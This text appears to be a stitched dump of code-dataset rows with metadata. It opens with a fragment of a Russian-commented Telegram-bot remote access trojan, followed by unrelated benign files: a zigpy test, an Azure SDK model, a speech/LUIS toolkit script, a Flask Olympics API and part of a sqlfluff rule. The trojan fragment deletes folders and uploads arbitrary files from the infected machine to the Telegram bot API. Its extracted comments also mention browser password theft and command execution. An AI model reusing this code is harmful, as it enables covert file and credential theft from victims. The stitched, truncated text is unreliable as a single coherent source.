bot.send_message(chat_id, "Ошибка! 
файл введен неверно!") @bot.message_handler(commands=["cd", "Cd"]) # ПЕРЕЙТИ В ПАПКУ def cddir(message): try: user_msg = "{0}".format(message.text) # Переменная принемающая сообщение от юзера folder = user_msg.split(" ")[1] os.chdir(folder) bot.send_message(chat_id, "Директория изменена на " + folder) except: bot.send_message(chat_id, "Ошибка! Папка введена неправильно!") @bot.message_handler(commands =["Download", "download"]) # ЗАГРУЗКА ФАЙЛА def downloadfile(message): try: user_msg = "{0}".format(message.text) docc = user_msg.split(" ")[1] # Переменная, в которой содержится имя файла doccc = {'document': open(docc,'rb')} # Переменная для POST запроса requests.post("https://api.telegram.org/bot" + bot_token + "/sendDocument?chat_id=" + chat_id , files=doccc) # Отправляем файл except: bot.send_message(chat_id, "Ошибка! Файл введен неверно!") @bot.message_handler(commands = ["deldir", "Deldir"]) # УДАЛИТЬ ПАПКУ def deletedir(message): try: user_msg = "{0}".format(message.text) # Переменная принемающая сообщение от юзера path2del = user_msg.split(" ")[1] os.removedirs(path2del) bot.send_message(chat_id, "Директория " + path2del + " удалена") except: bot.send_message(chat_id, "Ошибка! Папка введена неверно!") bot.polling()
ru
0.988867
# # ПАРОЛИ # Если сообщение /passwords chrome # ИначеЕсли текст /passwords opera # ИНФОРМАЦИЯ # ДИРЕКТОРИЯ # ПРОЦЕССЫ # CMD # Отправка сообщения # ОТКРЫТЬ ССЫЛКУ # ВСЕ ФАЙЛЫ # ПЕРЕЙТИ В ПАПКУ # Переменная принемающая сообщение от юзера # ЗАГРУЗКА ФАЙЛА # Переменная, в которой содержится имя файла # Переменная для POST запроса # Отправляем файл # УДАЛИТЬ ПАПКУ # Переменная принемающая сообщение от юзера
2.25546
2
tests/test_kof.py
danielbrunt57/zha-device-handlers
0
6628966
<gh_stars>0 """Tests for KOF.""" from unittest import mock import zigpy.device import zigpy.endpoint import zigpy.quirks import zhaquirks.kof.kof_mr101z def test_kof_no_reply(): """Test KOF No reply.""" class TestCluster( zhaquirks.kof.kof_mr101z.NoReplyMixin, zigpy.quirks.CustomCluster ): """Test Cluster Class.""" cluster_id = 0x1234 void_input_commands = [0x0002] server_commands = { 0x0001: ("noop", (), False), 0x0002: ("noop_noreply", (), False), } client_commands = {} end_point = mock.MagicMock() cluster = TestCluster(end_point) cluster.command(0x0001) end_point.request.assert_called_with( mock.ANY, mock.ANY, mock.ANY, expect_reply=True, command_id=mock.ANY ) end_point.reset_mock() cluster.command(0x0001, expect_reply=False) end_point.request.assert_called_with( mock.ANY, mock.ANY, mock.ANY, expect_reply=False, command_id=mock.ANY ) end_point.reset_mock() cluster.command(0x0002) end_point.request.assert_called_with( mock.ANY, mock.ANY, mock.ANY, expect_reply=False, command_id=mock.ANY ) end_point.reset_mock() cluster.command(0x0002, expect_reply=True) end_point.request.assert_called_with( mock.ANY, mock.ANY, mock.ANY, expect_reply=True, command_id=mock.ANY ) end_point.reset_mock()
"""Tests for KOF.""" from unittest import mock import zigpy.device import zigpy.endpoint import zigpy.quirks import zhaquirks.kof.kof_mr101z def test_kof_no_reply(): """Test KOF No reply.""" class TestCluster( zhaquirks.kof.kof_mr101z.NoReplyMixin, zigpy.quirks.CustomCluster ): """Test Cluster Class.""" cluster_id = 0x1234 void_input_commands = [0x0002] server_commands = { 0x0001: ("noop", (), False), 0x0002: ("noop_noreply", (), False), } client_commands = {} end_point = mock.MagicMock() cluster = TestCluster(end_point) cluster.command(0x0001) end_point.request.assert_called_with( mock.ANY, mock.ANY, mock.ANY, expect_reply=True, command_id=mock.ANY ) end_point.reset_mock() cluster.command(0x0001, expect_reply=False) end_point.request.assert_called_with( mock.ANY, mock.ANY, mock.ANY, expect_reply=False, command_id=mock.ANY ) end_point.reset_mock() cluster.command(0x0002) end_point.request.assert_called_with( mock.ANY, mock.ANY, mock.ANY, expect_reply=False, command_id=mock.ANY ) end_point.reset_mock() cluster.command(0x0002, expect_reply=True) end_point.request.assert_called_with( mock.ANY, mock.ANY, mock.ANY, expect_reply=True, command_id=mock.ANY ) end_point.reset_mock()
en
0.856493
Tests for KOF. Test KOF No reply. Test Cluster Class.
2.276341
2
azure-mgmt-iothub/azure/mgmt/iothub/models/iot_hub_sku_info.py
v-Ajnava/azure-sdk-for-python
4
6628967
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- from msrest.serialization import Model class IotHubSkuInfo(Model): """Information about the SKU of the IoT hub. Variables are only populated by the server, and will be ignored when sending a request. :param name: The name of the SKU. Possible values include: 'F1', 'S1', 'S2', 'S3' :type name: str or :class:`IotHubSku <azure.mgmt.iothub.models.IotHubSku>` :ivar tier: The billing tier for the IoT hub. Possible values include: 'Free', 'Standard' :vartype tier: str or :class:`IotHubSkuTier <azure.mgmt.iothub.models.IotHubSkuTier>` :param capacity: The number of provisioned IoT Hub units. See: https://docs.microsoft.com/azure/azure-subscription-service-limits#iot-hub-limits. :type capacity: long """ _validation = { 'name': {'required': True}, 'tier': {'readonly': True}, 'capacity': {'required': True}, } _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'tier': {'key': 'tier', 'type': 'IotHubSkuTier'}, 'capacity': {'key': 'capacity', 'type': 'long'}, } def __init__(self, name, capacity): self.name = name self.tier = None self.capacity = capacity
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- from msrest.serialization import Model class IotHubSkuInfo(Model): """Information about the SKU of the IoT hub. Variables are only populated by the server, and will be ignored when sending a request. :param name: The name of the SKU. Possible values include: 'F1', 'S1', 'S2', 'S3' :type name: str or :class:`IotHubSku <azure.mgmt.iothub.models.IotHubSku>` :ivar tier: The billing tier for the IoT hub. Possible values include: 'Free', 'Standard' :vartype tier: str or :class:`IotHubSkuTier <azure.mgmt.iothub.models.IotHubSkuTier>` :param capacity: The number of provisioned IoT Hub units. See: https://docs.microsoft.com/azure/azure-subscription-service-limits#iot-hub-limits. :type capacity: long """ _validation = { 'name': {'required': True}, 'tier': {'readonly': True}, 'capacity': {'required': True}, } _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'tier': {'key': 'tier', 'type': 'IotHubSkuTier'}, 'capacity': {'key': 'capacity', 'type': 'long'}, } def __init__(self, name, capacity): self.name = name self.tier = None self.capacity = capacity
en
0.570188
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- Information about the SKU of the IoT hub. Variables are only populated by the server, and will be ignored when sending a request. :param name: The name of the SKU. Possible values include: 'F1', 'S1', 'S2', 'S3' :type name: str or :class:`IotHubSku <azure.mgmt.iothub.models.IotHubSku>` :ivar tier: The billing tier for the IoT hub. Possible values include: 'Free', 'Standard' :vartype tier: str or :class:`IotHubSkuTier <azure.mgmt.iothub.models.IotHubSkuTier>` :param capacity: The number of provisioned IoT Hub units. See: https://docs.microsoft.com/azure/azure-subscription-service-limits#iot-hub-limits. :type capacity: long
1.784634
2
src/glue.py
karlotimmerman/glue
14
6628968
''' GLUE - THE TOOLKIT FOR MICROSOFT COGNITIVE SERVICES ''' ''' <EMAIL> ''' ''' Supports Text-To-Speech (TTS), Speech-To-Text (STT), Evaluation, LUIS-Scoring ''' # Import standard packages import os import sys import shutil import logging import argparse import pandas as pd # Import custom modules import stt import tts import luis_scoring as luis import params as pa import helper as he import evaluate as eval ''' COMMAND EXAMPLES ''' # python .\src\glue.py --do_synthesize --input input/scoringfile.txt # Parse arguments parser = argparse.ArgumentParser() args = pa.get_params(parser) # Set arguments fname = args.input audio_files = args.audio do_synthesize = args.do_synthesize do_scoring = args.do_scoring do_transcribe = args.do_transcribe do_evaluate = args.do_evaluate # Get config from file pa.get_config() # Set logging level to INFO logging.getLogger().setLevel(logging.INFO) if __name__ == '__main__': logging.info('[INFO] - Starting GLUE - v0.2') # Case Management if any([do_scoring, do_synthesize, do_transcribe, do_evaluate]): output_folder, case = he.create_case(pa.output_folder) logging.info(f'[INFO] - Created case {case}') try: os.makedirs(f"{output_folder}/{case}/input", exist_ok=True) shutil.copyfile(fname, f'{output_folder}/{case}/input/{os.path.basename(fname)}') df_reference = pd.read_csv(f'{output_folder}/{case}/input/{os.path.basename(fname)}', sep=',', encoding='utf-8', index_col=None) logging.info(f'[INFO] - Copied input file(s) to case folder') except Exception as e: if do_synthesize or do_scoring: logging.error(f'[ERROR] - Error with input file or FileNotFound, but it is required for --do_transcribe and/or --do_scoring -> {e}') sys.exit() else: logging.warning('[WARNING] - Could not find input file, but we can continue here') df_reference = pd.DataFrame() else: logging.error('[ERROR] - Please activate at least one of the following modes: --do_synthesize, --do_transcribe, --do_scoring, --do_evaluate (see --help for further information)!') sys.exit() 
# TTS if do_synthesize: logging.info(f'[INFO] - Starting text-to-speech synthetization of {len(df_reference)} utterances') df_reference = tts.main(df_reference, f'{output_folder}/{case}') df_reference[['audio_synth', 'text']].to_csv(f'{output_folder}/{case}/tts_transcription.txt', sep = "\t", header = None, index = False) df_reference[['audio_synth', 'text']].to_csv(f'{output_folder}/{case}/tts_transcription.csv', sep = ",", index = False) logging.info(f'[INFO] - Finished text-to-speech synthetization of {len(df_reference)} utterances and wrote output files') # STT if do_transcribe: if audio_files != None: logging.info('[INFO] - Starting with speech-to-text conversion') stt_results = stt.main(f'{audio_files}/', f'{output_folder}/{case}') df_transcription = pd.DataFrame(list(stt_results), columns=['audio', 'rec']) logging.debug(df_transcription) df_transcription.to_csv(f'{output_folder}/{case}/stt_transcriptions.txt', sep = '\t', header = None, index=False) # Merge reference transcriptions with recognition on audio file names if 'audio' in list(df_reference.columns): df_reference = pd.merge(left = df_reference, right = df_transcription, how = 'left', on = 'audio') logging.info(f'[INFO] - Merged imported reference transcriptions and recognitions') df_reference.to_csv(f'{output_folder}/{case}/transcriptions_full.csv', sep = ',', encoding = 'utf-8', index = False) logging.info(f'[INFO] - Wrote transcription file to case folder') else: logging.error('[ERROR] - It seems like you did not pass a path to audio files, cannot do transcriptions') sys.exit() # Speech Evaluation if do_evaluate: logging.info('[INFO] - Starting with reference vs. 
recognition evaluation') if 'text' in list(df_reference.columns) and 'rec' in list(df_reference.columns): eval.main(df_reference) logging.info('[INFO] - Evaluated reference and recognition transcriptions') else: logging.error('[ERROR] - Cannot do evaluation, please verify that you both have "text" and "rec" in your data!') # LUIS Scoring if do_scoring: logging.info('[INFO] - Starting with LUIS scoring') logging.info(f'[INFO] - Set LUIS treshold to {pa.luis_treshold}') if 'intent' in list(df_reference.columns) and not 'rec' in list(df_reference.columns): luis_scoring = luis.main(df_reference, 'text') elif all(['intent' in list(df_reference.columns), 'rec' in list(df_reference.columns)]): luis_scoring = luis.main(df_reference, 'text') luis_scoring = luis.main(df_reference, 'rec') elif 'intent' in list(df_reference.columns) and not 'text' in list(df_reference.columns): luis_scoring = luis.main(df_reference, 'rec') else: logging.error('[ERROR] - Cannot do LUIS scoring, please verify that you have an "intent"-column in your data.') # Write to output file luis_scoring['luis_treshold'] = pa.luis_treshold luis_scoring.to_csv(f'{output_folder}/{case}/luis_scoring.csv', sep = ',', encoding = 'utf-8', index=False) # Finish run logging.info(f'[INFO] - Finished with the run {case}!')
''' GLUE - THE TOOLKIT FOR MICROSOFT COGNITIVE SERVICES ''' ''' <EMAIL> ''' ''' Supports Text-To-Speech (TTS), Speech-To-Text (STT), Evaluation, LUIS-Scoring ''' # Import standard packages import os import sys import shutil import logging import argparse import pandas as pd # Import custom modules import stt import tts import luis_scoring as luis import params as pa import helper as he import evaluate as eval ''' COMMAND EXAMPLES ''' # python .\src\glue.py --do_synthesize --input input/scoringfile.txt # Parse arguments parser = argparse.ArgumentParser() args = pa.get_params(parser) # Set arguments fname = args.input audio_files = args.audio do_synthesize = args.do_synthesize do_scoring = args.do_scoring do_transcribe = args.do_transcribe do_evaluate = args.do_evaluate # Get config from file pa.get_config() # Set logging level to INFO logging.getLogger().setLevel(logging.INFO) if __name__ == '__main__': logging.info('[INFO] - Starting GLUE - v0.2') # Case Management if any([do_scoring, do_synthesize, do_transcribe, do_evaluate]): output_folder, case = he.create_case(pa.output_folder) logging.info(f'[INFO] - Created case {case}') try: os.makedirs(f"{output_folder}/{case}/input", exist_ok=True) shutil.copyfile(fname, f'{output_folder}/{case}/input/{os.path.basename(fname)}') df_reference = pd.read_csv(f'{output_folder}/{case}/input/{os.path.basename(fname)}', sep=',', encoding='utf-8', index_col=None) logging.info(f'[INFO] - Copied input file(s) to case folder') except Exception as e: if do_synthesize or do_scoring: logging.error(f'[ERROR] - Error with input file or FileNotFound, but it is required for --do_transcribe and/or --do_scoring -> {e}') sys.exit() else: logging.warning('[WARNING] - Could not find input file, but we can continue here') df_reference = pd.DataFrame() else: logging.error('[ERROR] - Please activate at least one of the following modes: --do_synthesize, --do_transcribe, --do_scoring, --do_evaluate (see --help for further information)!') sys.exit() 
# TTS if do_synthesize: logging.info(f'[INFO] - Starting text-to-speech synthetization of {len(df_reference)} utterances') df_reference = tts.main(df_reference, f'{output_folder}/{case}') df_reference[['audio_synth', 'text']].to_csv(f'{output_folder}/{case}/tts_transcription.txt', sep = "\t", header = None, index = False) df_reference[['audio_synth', 'text']].to_csv(f'{output_folder}/{case}/tts_transcription.csv', sep = ",", index = False) logging.info(f'[INFO] - Finished text-to-speech synthetization of {len(df_reference)} utterances and wrote output files') # STT if do_transcribe: if audio_files != None: logging.info('[INFO] - Starting with speech-to-text conversion') stt_results = stt.main(f'{audio_files}/', f'{output_folder}/{case}') df_transcription = pd.DataFrame(list(stt_results), columns=['audio', 'rec']) logging.debug(df_transcription) df_transcription.to_csv(f'{output_folder}/{case}/stt_transcriptions.txt', sep = '\t', header = None, index=False) # Merge reference transcriptions with recognition on audio file names if 'audio' in list(df_reference.columns): df_reference = pd.merge(left = df_reference, right = df_transcription, how = 'left', on = 'audio') logging.info(f'[INFO] - Merged imported reference transcriptions and recognitions') df_reference.to_csv(f'{output_folder}/{case}/transcriptions_full.csv', sep = ',', encoding = 'utf-8', index = False) logging.info(f'[INFO] - Wrote transcription file to case folder') else: logging.error('[ERROR] - It seems like you did not pass a path to audio files, cannot do transcriptions') sys.exit() # Speech Evaluation if do_evaluate: logging.info('[INFO] - Starting with reference vs. 
recognition evaluation') if 'text' in list(df_reference.columns) and 'rec' in list(df_reference.columns): eval.main(df_reference) logging.info('[INFO] - Evaluated reference and recognition transcriptions') else: logging.error('[ERROR] - Cannot do evaluation, please verify that you both have "text" and "rec" in your data!') # LUIS Scoring if do_scoring: logging.info('[INFO] - Starting with LUIS scoring') logging.info(f'[INFO] - Set LUIS treshold to {pa.luis_treshold}') if 'intent' in list(df_reference.columns) and not 'rec' in list(df_reference.columns): luis_scoring = luis.main(df_reference, 'text') elif all(['intent' in list(df_reference.columns), 'rec' in list(df_reference.columns)]): luis_scoring = luis.main(df_reference, 'text') luis_scoring = luis.main(df_reference, 'rec') elif 'intent' in list(df_reference.columns) and not 'text' in list(df_reference.columns): luis_scoring = luis.main(df_reference, 'rec') else: logging.error('[ERROR] - Cannot do LUIS scoring, please verify that you have an "intent"-column in your data.') # Write to output file luis_scoring['luis_treshold'] = pa.luis_treshold luis_scoring.to_csv(f'{output_folder}/{case}/luis_scoring.csv', sep = ',', encoding = 'utf-8', index=False) # Finish run logging.info(f'[INFO] - Finished with the run {case}!')
en
0.475288
GLUE - THE TOOLKIT FOR MICROSOFT COGNITIVE SERVICES <EMAIL> Supports Text-To-Speech (TTS), Speech-To-Text (STT), Evaluation, LUIS-Scoring # Import standard packages # Import custom modules COMMAND EXAMPLES # python .\src\glue.py --do_synthesize --input input/scoringfile.txt # Parse arguments # Set arguments # Get config from file # Set logging level to INFO # Case Management # TTS # STT # Merge reference transcriptions with recognition on audio file names # Speech Evaluation # LUIS Scoring # Write to output file # Finish run
2.333995
2
olympics/olympics-api.py
robbie-young/cs257
0
6628969
<reponame>robbie-young/cs257<gh_stars>0 ''' olympics-api.py Authors: <NAME>, 28 October 2021 For use in the 'olympics' project in Carleton's CS257 course, Fall term ''' import flask import json import psycopg2 import argparse import config from config import database as config_database from config import user as config_user from config import password as config_password app = flask.Flask(__name__) def connect(connect_database, connect_user, connect_password): try: connection = psycopg2.connect(database=connect_database, user=connect_user, password=connect_password) return connection except Exception as e: print(e) exit() @app.route('/') def base(): return ''' [̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅] ''' @app.route('/games') def games(): connection = connect(config_database, config_user, config_password) query = '''SELECT games.id, games.year, seasons.season, games.city FROM games, seasons WHERE games.season_id = seasons.id ORDER BY games.year''' try: cursor = connection.cursor() cursor.execute(query) except Exception as e: print(e) exit() games_list = [] for game in cursor: game_dict = {} game_dict['id'] = game[0] game_dict['year'] = game[1] game_dict['season'] = game[2] game_dict['city'] = game[3] games_list.append(game_dict) connection.close() return json.dumps(games_list) @app.route('/nocs') def nocs(): connection = connect(config_database, config_user, config_password) query = '''SELECT DISTINCT noc_regions.noc, noc_regions.region FROM noc_regions ORDER BY noc''' try: cursor = connection.cursor() cursor.execute(query) except Exception as e: print(e) exit() noc_list = [] for noc in cursor: noc_dict = {} noc_dict['abbreviation'] 
= noc[0] noc_dict['name'] = noc[1] noc_list.append(noc_dict) connection.close() return json.dumps(noc_list) @app.route('/medalists/games/<games_id>') def medalists(games_id): connection = connect(config_database, config_user, config_password) noc = flask.request.args.get('noc') query = '''SELECT DISTINCT athletes.id, athlete_names.name, athletes.sex, sports.sport, events.event, medals.medal FROM athlete_names, athletes, sports, events, medals, noc_regions, super_table WHERE athlete_names.id = athletes.name_id AND super_table.athlete_id = athletes.id AND sports.id = events.sport_id AND super_table.event_id = events.id AND super_table.medal_id = medals.id AND medals.medal NOT LIKE 'NA' AND super_table.game_id = %s''' try: cursor = connection.cursor() if noc is not None: query += '''AND noc_regions.noc LIKE %s AND super_table.noc_region_id = noc_regions.id''' cursor.execute(query, (games_id, noc)) else: cursor.execute(query, (games_id, )) except Exception as e: print(e) exit() medalists_list = [] for medalist in cursor: medalist_dict = {} medalist_dict['athlete_id'] = medalist[0] medalist_dict['athlete_name'] = medalist[1] medalist_dict['athlete_sex'] = medalist[2] medalist_dict['sport'] = medalist[3] medalist_dict['event'] = medalist[4] medalist_dict['medal'] = medalist[5] medalists_list.append(medalist_dict) connection.close() return json.dumps(medalists_list) def main(): # print(base()) # print(games()) # print(nocs()) # print(medalists(1)) parser = argparse.ArgumentParser('A sample Flask application/API') parser.add_argument('host', help='the host on which this application is running') parser.add_argument('port', type=int, help='the port on which this application is listening') arguments = parser.parse_args() app.run(host=arguments.host, port=arguments.port, debug=True) if __name__ == '__main__': main()
''' olympics-api.py Authors: <NAME>, 28 October 2021 For use in the 'olympics' project in Carleton's CS257 course, Fall term ''' import flask import json import psycopg2 import argparse import config from config import database as config_database from config import user as config_user from config import password as config_password app = flask.Flask(__name__) def connect(connect_database, connect_user, connect_password): try: connection = psycopg2.connect(database=connect_database, user=connect_user, password=connect_password) return connection except Exception as e: print(e) exit() @app.route('/') def base(): return ''' [̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅] ''' @app.route('/games') def games(): connection = connect(config_database, config_user, config_password) query = '''SELECT games.id, games.year, seasons.season, games.city FROM games, seasons WHERE games.season_id = seasons.id ORDER BY games.year''' try: cursor = connection.cursor() cursor.execute(query) except Exception as e: print(e) exit() games_list = [] for game in cursor: game_dict = {} game_dict['id'] = game[0] game_dict['year'] = game[1] game_dict['season'] = game[2] game_dict['city'] = game[3] games_list.append(game_dict) connection.close() return json.dumps(games_list) @app.route('/nocs') def nocs(): connection = connect(config_database, config_user, config_password) query = '''SELECT DISTINCT noc_regions.noc, noc_regions.region FROM noc_regions ORDER BY noc''' try: cursor = connection.cursor() cursor.execute(query) except Exception as e: print(e) exit() noc_list = [] for noc in cursor: noc_dict = {} noc_dict['abbreviation'] = noc[0] noc_dict['name'] = noc[1] 
noc_list.append(noc_dict) connection.close() return json.dumps(noc_list) @app.route('/medalists/games/<games_id>') def medalists(games_id): connection = connect(config_database, config_user, config_password) noc = flask.request.args.get('noc') query = '''SELECT DISTINCT athletes.id, athlete_names.name, athletes.sex, sports.sport, events.event, medals.medal FROM athlete_names, athletes, sports, events, medals, noc_regions, super_table WHERE athlete_names.id = athletes.name_id AND super_table.athlete_id = athletes.id AND sports.id = events.sport_id AND super_table.event_id = events.id AND super_table.medal_id = medals.id AND medals.medal NOT LIKE 'NA' AND super_table.game_id = %s''' try: cursor = connection.cursor() if noc is not None: query += '''AND noc_regions.noc LIKE %s AND super_table.noc_region_id = noc_regions.id''' cursor.execute(query, (games_id, noc)) else: cursor.execute(query, (games_id, )) except Exception as e: print(e) exit() medalists_list = [] for medalist in cursor: medalist_dict = {} medalist_dict['athlete_id'] = medalist[0] medalist_dict['athlete_name'] = medalist[1] medalist_dict['athlete_sex'] = medalist[2] medalist_dict['sport'] = medalist[3] medalist_dict['event'] = medalist[4] medalist_dict['medal'] = medalist[5] medalists_list.append(medalist_dict) connection.close() return json.dumps(medalists_list) def main(): # print(base()) # print(games()) # print(nocs()) # print(medalists(1)) parser = argparse.ArgumentParser('A sample Flask application/API') parser.add_argument('host', help='the host on which this application is running') parser.add_argument('port', type=int, help='the port on which this application is listening') arguments = parser.parse_args() app.run(host=arguments.host, port=arguments.port, debug=True) if __name__ == '__main__': main()
en
0.481259
olympics-api.py Authors: <NAME>, 28 October 2021 For use in the 'olympics' project in Carleton's CS257 course, Fall term [̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅][̲̅$̲̅(̲̅5̲̅)̲̅$̲̅] SELECT games.id, games.year, seasons.season, games.city FROM games, seasons WHERE games.season_id = seasons.id ORDER BY games.year SELECT DISTINCT noc_regions.noc, noc_regions.region FROM noc_regions ORDER BY noc SELECT DISTINCT athletes.id, athlete_names.name, athletes.sex, sports.sport, events.event, medals.medal FROM athlete_names, athletes, sports, events, medals, noc_regions, super_table WHERE athlete_names.id = athletes.name_id AND super_table.athlete_id = athletes.id AND sports.id = events.sport_id AND super_table.event_id = events.id AND super_table.medal_id = medals.id AND medals.medal NOT LIKE 'NA' AND super_table.game_id = %s AND noc_regions.noc LIKE %s AND super_table.noc_region_id = noc_regions.id # print(base()) # print(games()) # print(nocs()) # print(medalists(1))
3.378283
3
openpype/modules/default_modules/ftrack/interfaces.py
yosuperdope/OpenPype
0
6628970
from abc import abstractmethod from openpype.modules import OpenPypeInterface class IFtrackEventHandlerPaths(OpenPypeInterface): """Other modules interface to return paths to ftrack event handlers. Expected output is dictionary with "server" and "user" keys. """ @abstractmethod def get_event_handler_paths(self): pass
from abc import abstractmethod from openpype.modules import OpenPypeInterface class IFtrackEventHandlerPaths(OpenPypeInterface): """Other modules interface to return paths to ftrack event handlers. Expected output is dictionary with "server" and "user" keys. """ @abstractmethod def get_event_handler_paths(self): pass
en
0.846927
Other modules interface to return paths to ftrack event handlers. Expected output is dictionary with "server" and "user" keys.
2.619809
3
src/sqlfluff/rules/L042.py
fdw/sqlfluff
0
6628971
<reponame>fdw/sqlfluff """Implementation of Rule L042.""" from typing import Optional from sqlfluff.core.rules.base import BaseRule, LintResult, RuleContext from sqlfluff.core.rules.doc_decorators import document_configuration from sqlfluff.core.rules.functional.segment_predicates import is_type @document_configuration class Rule_L042(BaseRule): """Join/From clauses should not contain subqueries. Use CTEs instead. By default this rule is configured to allow subqueries within ``FROM`` clauses but not within ``JOIN`` clauses. If you prefer a stricter lint then this is configurable. NB: Some dialects don't allow CTEs, and for those dialects this rule makes no sense and should be disabled. | **Anti-pattern** .. code-block:: sql select a.x, a.y, b.z from a join ( select x, z from b ) using(x) | **Best practice** .. code-block:: sql with c as ( select x, z from b ) select a.x, a.y, c.z from a join c using(x) """ config_keywords = ["forbid_subquery_in"] _config_mapping = { "join": ["join_clause"], "from": ["from_expression"], "both": ["join_clause", "from_expression"], } def _eval(self, context: RuleContext) -> Optional[LintResult]: """Join/From clauses should not contain subqueries. Use CTEs instead. NB: No fix for this routine because it would be very complex to implement reliably. """ parent_types = self._config_mapping[self.forbid_subquery_in] # type: ignore for parent_type in parent_types: if context.segment.is_type(parent_type): # Get the referenced table segment from_expression_element = context.functional.segment.children( is_type("from_expression_element") ).children(is_type("table_expression")) # Is it bracketed? If so, lint that instead. bracketed_expression = from_expression_element.children( is_type("bracketed") ) if bracketed_expression: from_expression_element = bracketed_expression # If we find a child with a "problem" type, raise an issue. # If not, we're fine. 
seg = from_expression_element.children( is_type( "with_compound_statement", "set_expression", "select_statement", ) ) if seg: return LintResult( anchor=seg[0], description=f"{parent_type} clauses should not contain subqueries. Use CTEs instead", ) return None
"""Implementation of Rule L042.""" from typing import Optional from sqlfluff.core.rules.base import BaseRule, LintResult, RuleContext from sqlfluff.core.rules.doc_decorators import document_configuration from sqlfluff.core.rules.functional.segment_predicates import is_type @document_configuration class Rule_L042(BaseRule): """Join/From clauses should not contain subqueries. Use CTEs instead. By default this rule is configured to allow subqueries within ``FROM`` clauses but not within ``JOIN`` clauses. If you prefer a stricter lint then this is configurable. NB: Some dialects don't allow CTEs, and for those dialects this rule makes no sense and should be disabled. | **Anti-pattern** .. code-block:: sql select a.x, a.y, b.z from a join ( select x, z from b ) using(x) | **Best practice** .. code-block:: sql with c as ( select x, z from b ) select a.x, a.y, c.z from a join c using(x) """ config_keywords = ["forbid_subquery_in"] _config_mapping = { "join": ["join_clause"], "from": ["from_expression"], "both": ["join_clause", "from_expression"], } def _eval(self, context: RuleContext) -> Optional[LintResult]: """Join/From clauses should not contain subqueries. Use CTEs instead. NB: No fix for this routine because it would be very complex to implement reliably. """ parent_types = self._config_mapping[self.forbid_subquery_in] # type: ignore for parent_type in parent_types: if context.segment.is_type(parent_type): # Get the referenced table segment from_expression_element = context.functional.segment.children( is_type("from_expression_element") ).children(is_type("table_expression")) # Is it bracketed? If so, lint that instead. bracketed_expression = from_expression_element.children( is_type("bracketed") ) if bracketed_expression: 